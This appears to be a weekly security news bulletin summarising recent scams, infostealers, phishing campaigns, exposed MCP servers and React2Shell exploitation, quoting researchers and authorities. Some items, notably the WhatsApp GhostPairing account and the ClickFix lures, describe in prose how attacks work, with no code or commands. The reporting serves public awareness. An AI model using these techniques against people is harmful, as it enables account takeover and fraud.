ThreatsDay Bulletin: WhatsApp Hijacks, MCP Leaks, AI Recon, React2Shell Exploit and 15 More Stories

This week’s ThreatsDay Bulletin tracks how attackers keep reshaping old tools and finding new angles in familiar systems. Small changes in tactics are stacking up fast, and each one hints at where the next big breach could come from.

From shifting infrastructures to clever social hooks, the week’s activity shows just how fluid the threat landscape has become.

Here’s the full rundown of what moved in the cyber world this week.

2. International scam ring busted

   Authorities from the Czech Republic, Latvia, Lithuania, and Ukraine, along with Eurojust, took action against a criminal network operating call centers in Dnipro, Ivano-Frankivsk, and Kyiv that scammed more than 400 victims across Europe out of more than €10 million ($11.7 million). “The criminal group established a professional organisation with employees who received a percentage of the proceeds for each completed scam,” Eurojust said. “The fraudsters used various scams, such as posing as police officers to withdraw money using their victims’ cards and details, or pretending that their victims’ bank accounts had been hacked. They convinced their victims to transfer large sums of money from their ‘compromised’ bank accounts to ‘safe’ bank accounts controlled by the network. They also lured victims into downloading remote access software and entering their banking details, enabling the criminal group to access and control the victims’ bank accounts.” The call centers employed approximately 100 people and were recruited from the Czech Republic, Latvia, Lithuania, and other countries. They played different roles, ranging from making calls and forging official certificates from the police and banks to collecting cash from their victims. Employees who successfully managed to obtain money from their victims would receive up to 7% of the proceeds to encourage them to continue the scam. The criminal enterprise also promised cash bonuses, cars, or apartments in Kyiv for employees who obtained more than €100,000. The operation led to the arrest of 12 suspects on December 9, 2025. Authorities also seized cash, 21 vehicles, and various weapons and ammunition.

3. UK nudity filter push

   The U.K. government reportedly will “encourage” Apple and Google to prevent phones from displaying nude images except when users verify that they are adults. According to a new report from The Financial Times, the push for nudity-detection won’t be a legal requirement “for now,” but is said to be part of the government’s strategy to tackle violence against women and girls. “The U.K. government wants technology companies to block explicit images on phones and computers by default to protect children, with adults having to verify their age to create and access such content,” the report said. “Ministers want the likes of Apple and Google to incorporate nudity-detection algorithms into their device operating systems to prevent users from taking photos or sharing images of genitalia unless they are verified as adults.”

4. Modular infostealer emerges

   A new, modular information stealer named SantaStealer is being advertised by Russian-speaking operators on Telegram and underground forums like Lolz. “The malware collects and exfiltrates sensitive documents, credentials, wallets, and data from a broad range of applications, and aims to operate entirely in-memory to avoid file-based detection,” Rapid7 said. “Stolen data is then compressed, split into 10 MB chunks, and sent to a C2 server over unencrypted HTTP.” SantaStealer uses 14 distinct data-collection modules, each running in its own thread and exfiltrating the stolen information. It also uses an embedded DLL to bypass Chrome’s app-bound encryption protections and harvest browser credentials, including passwords, cookies, and saved credit cards from the web browser. Assessed to be a rebranding of BluelineStealer, the malware is available for $175 per month for a basic plan and $300 per month for a premium plan that lets customers edit execution delays and enable clipper functionality to substitute wallet addresses copied to the clipboard with an attacker-controlled one to reroute transactions. The threat actor has been active on Telegram since at least July 2025.

5. Bulletproof hosting exposed

   Threat actors leveraging Bulletproof Hosting (BPH) providers move faster than defenders can respond, often migrating operations, re-registering domains, and re-establishing services within hours of takedowns, Silent Push said in a new exhaustive analysis of BPH services. “Without knowledge of where this infrastructure shifts, takedowns lack the permanence they need,” Silent Push said. “And without a coordinated shift in both regulatory pressure and the law-enforcement action aimed at these providers, […] Bulletproof Hosting as a service will continue to thrive – as will the malicious operations built on top of it.”

6. C2 servers tracked

   An analysis of DDoSia’s multi-layered command-and-control (C2) infrastructure has revealed an average of 6 control servers active at any given time. “However, servers typically have a relatively short lifespan — averaging 2.53 days,” Censys said. “Some servers we have observed are active for over a week, but most instances we only see for less than a few hours.” DDoSia is a participatory distributed denial-of-service (DDoS) capability built by Russian hacktivists in 2022, coinciding with the early days of the Russo-Ukrainian war. It’s operated by the pro-Russian hacktivist group NoName057(16), which was taken down earlier this July. It has since made a comeback. Targeting of DDoSia is heavily focused on Ukraine, European allies, and NATO states in government, military, transportation, public utilities, financial, and tourism sectors.

7. WhatsApp hijack campaign

   Threat actors are using a new social engineering technique to hijack WhatsApp accounts. The new GhostPairing attack lures victims by sending messages from compromised accounts that contain a link to a Facebook-style preview. Clicking on the link takes the victim to a page that imitates a Facebook viewer and asks them to verify before the content can be served. As part of this step, they are either asked to scan a QR code that will link an attacker’s browser to the victim’s WhatsApp account, granting them unauthorized access to the victim’s account. “To abuse this flow, an attacker would open WhatsApp Web in their own browser, capture the QR code shown there, and embed it into the fake Facebook viewer page. The victim would then be told to open WhatsApp, go to Linked devices, and scan that QR in order to 'view the photo,’” Gen Digital said. Alternately, they are instructed to enter their phone number on the bogus page, which then forwards that number to WhatsApp’s legitimate “link device via phone number” feature. Once WhatsApp generates a pairing numeric code, it’s relayed back to the fake page, along with instructions to enter the code into WhatsApp to confirm a login. The attack, which abuses the legitimate device-linking feature on the platform, is a variation of a technique that was used by Russian state-sponsored actors to intercept Signal messages earlier this year. To check for any signs of compromise, users can navigate to Settings -> Linked Devices.

8. RuTube malware lure

   Bad actors have been observed hosting videos on the Russian video-sharing platform RuTube that advertise cheats for Roblox, tricking users into clicking on links that lead to Trojan and stealer malware like Salat Stealer. It’s worth noting that similar tactics have been widespread on YouTube.

9. Legacy cipher retired

   Microsoft has announced that it’s deprecating RC4 (Rivest Cipher 4) encryption in Kerberos to strengthen Windows authentication. By mid-2026, domain controller defaults will be updated for the Kerberos Key Distribution Center (KDC) on Windows Server 2008 and later to only allow AES-SHA1 encryption. RC4 will be disabled by default and only used in scenarios where a domain administrator explicitly configures an account or the KDC to use it. “RC4, once a staple for compatibility, is susceptible to attacks like Kerberoasting that can be used to steal credentials and compromise networks,” the company said. “It is crucial to discontinue using RC4.” The decision also comes after U.S. Senator Ron Wyden called on the U.S. Federal Trade Commission (FTC) to investigate the company over its use of the obsolete cipher.

10. IMSI catcher arrests

Serbian police have detained two Chinese nationals for driving around with an improvised IMSI catcher in their car that functioned as a fake mobile base station. The pair is alleged to have sent SMS phishing messages that tricked people into visiting phishing sites that masqueraded as mobile operators, government portals, and large companies to collect payment card details. The captured card data was later abused overseas to pay for goods and services. The names of the arrested individuals were not disclosed. But they are suspected to be part of an organized criminal group.

11. Exposed AI servers risk

New research from Bitsight has found roughly 1,000 Model Context Protocol (MCP) servers exposed on the internet with no authorization in place and leaking sensitive data. Some of them could allow management of a Kubernetes cluster and its pods, access to a Customer Relationship Management (CRM) tool, send WhatsApp messages, and even achieve remote code execution. "While Anthropic authored the MCP specification, it's not their job to enforce how every server handles authorization," Bitsight said. "Because authorization is optional, it's easy to skip it when moving from a demo to a real-world deployment, potentially exposing sensitive tools or data. Many MCP servers are designed for local use, but once one is exposed over HTTP, the attack surface expands dramatically." To counter the risk, it's essential that users do not expose MCP servers unless it's absolutely necessary and implement OAuth protections for authorization. The development comes as exposure management company Intruder revealed that a scan of approximately 5 million single-page applications found more than 42,000 tokens exposed in their code. The tokens span 334 types of secrets.

12. Fake tax scam deploys RATs

A phishing campaign impersonating the Income Tax Department of India has been found using themes related to alleged tax irregularities to create a false sense of urgency and deceive users into clicking on malicious links that deploy legitimate remote access tools like LogMeIn Resolve (formerly GoTo Resolve) that grant attackers unauthorized control over compromised systems. "The campaign delivered a two-stage malware chain consisting of a shellcode-based RAT loader packaged in a ZIP file and a rogue remote administration executable disguised as a GoTo Resolve updater," Raven AI said. "Traditional Secure Email Gateway defenses failed to detect these messages because the sender authenticated correctly, the attachments were password-protected, and the content imitated real government communication."

13. CBI busts SMS scam ring

India's Central Bureau of Investigation (CBI) said it disrupted a large cyber fraud setup that was being used to send phishing messages across the country with the goal of tricking people into bogus schemes like fake digital arrests, loan scams, and investment frauds. Three people have been arrested in connection with the case under Operation Chakra V. The investigation identified an organized cyber gang operating from the National Capital Region (NCR) and the Chandigarh area that managed to obtain around 21,000 SIM cards in violation of the Department of Telecommunications (DoT) rules. "This gang was providing bulk SMS services to cyber criminals," the CBI said. "It was found that even foreign cyber criminals were using this service to cheat Indian citizens. These SIM cards were controlled through an online platform to send bulk messages. The messages offered fake loans, investment opportunities, and other financial benefits, with the aim of stealing personal and banking details of innocent people." Separately, the agency also filed charges against 17 individuals, including four foreign nationals and 58 companies, in connection with an organized transnational cyber fraud network operating across multiple States in India. "The cyber criminals adopted a highly layered and technology-driven modus operandi, involving the use of Google advertisements, bulk SMS campaigns, SIM box-based messaging systems, cloud infrastructure, fintech platforms, and multiple mule bank accounts," the CBI said. "Each stage of the operation—from luring victims to collection and movement of funds—was deliberately structured to conceal the identities of the actual controllers and evade detection by law enforcement agencies."

14. APT phishing across Europe

StrikeReady Labs has disclosed details of a phishing campaign that has targeted Transnistria's governing body with a credential phishing email attachment by spoofing the Pridnestrovian Moldavian Republic. The HTML attachment shows a blurred decoy document along with a pop-up that prompts victims to enter their credentials. The entered information is transmitted to an attacker-controlled server. The campaign is believed to be active since at least 2023. Other targets likely include entities in Ukraine, Bosnia and Herzegovina, Macedonia, Montenegro, Spain, Lithuania, Bulgaria, and Moldova.

15. Fake CAPTCHA delivers malware

A new wave of ClickFix attacks has leveraged fake CAPTCHA checks that trick users into pasting in the Windows Run dialog, which runs the finger.exe tool to retrieve malicious PowerShell code. The attacks have been attributed to clusters tracked as KongTuke and SmartApeSG. The decades-old finger command is used to look up information about local and remote users on Unix and Linux systems via the Finger protocol. It was later added to Windows systems. In another ClickFix attack detected by Point Wild, phony browser notifications prompt users to click "How to fix" or copy-paste a PowerShell command that leads to the deployment of DarkGate malware via a malicious HTA file.

16. Google service abused

Threat actors are abusing Google's Application Integration service to send phishing emails from authentic @google.com addresses and bypass SPF, DKIM, and DMARC checks. The technique, according to xorlab, is being used in the wild to target organizations with highly convincing lures mimicking new sign-in alerts for Google accounts, effectively deceiving them into clicking on suspicious links. "To evade detection, attackers use multi-hop redirect chains that bounce through multiple legitimate services," the company said. "Each hop uses trusted infrastructure — Google, Microsoft, AWS – making the attack difficult to detect or block at any single point. Regardless of the entry point, victims eventually land on the Microsoft 365 login page, revealing the attackers' primary target: M365 credentials."

17. AI-driven ICS scans

Cato Networks said it observed large-scale reconnaissance and exploitation attempts targeting Modbus devices, including string monitoring boxes that directly control solar panel output. "In such cases, a threat actor with nothing more than an internet connection and a free tool could issue a simple command, 'SWITCH OFF,' cutting power on a bright, cloudless day," the company said. "What once required time, patience, and manual skill can now be scaled and accelerated through automation. With the rise of agentic AI tools, attackers can now automate reconnaissance and exploitation, reducing the time needed to execute such attacks from days to just minutes."

18. Ransomware joins exploit wave

The fallout from React2Shell (CVE-2025-55182) has continued to spread as multiple threat actors have jumped on the exploitation bandwagon to distribute a wide array of malware. The proliferation of public exploits and stealth backdoors has been complemented by attacks of varying origins and motivations, with cybersecurity firm S-RM revealing that the vulnerability was used as an initial access vector in a Weaxor ransomware attack on December 5, 2025. "This marks a shift from previously reported exploitation," S-RM said. "It indicates threat actors whose modus operandi involves cyber extortion are also successfully exploiting this vulnerability, albeit on a much smaller scale and likely in an automated fashion." Weaxor is assessed to be a rebrand of Mallox ransomware. The ransomware binary was dropped and executed on the system within less than one minute of initial access, indicating that this was likely part of an automated campaign. According to Palo Alto Networks Unit 42, more than 60 organizations have been impacted by incidents exploiting the vulnerability. Microsoft said it found "several hundred machines across a diverse set of organizations" that were compromised via React2Shell.

The patterns behind these stories keep repeating — faster code, smarter lures, and fewer pauses between discovery and abuse. Each case adds another piece to the wider map of how attacks adapt when attention fades.

Next week will bring a fresh set of shifts, but for now, these are the signals worth noting. Stay sharp, connect the dots, and watch what changes next.

That’s all for this edition of the ThreatsDay Bulletin — the pulse of what’s moving beneath the surface every Thursday.

Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.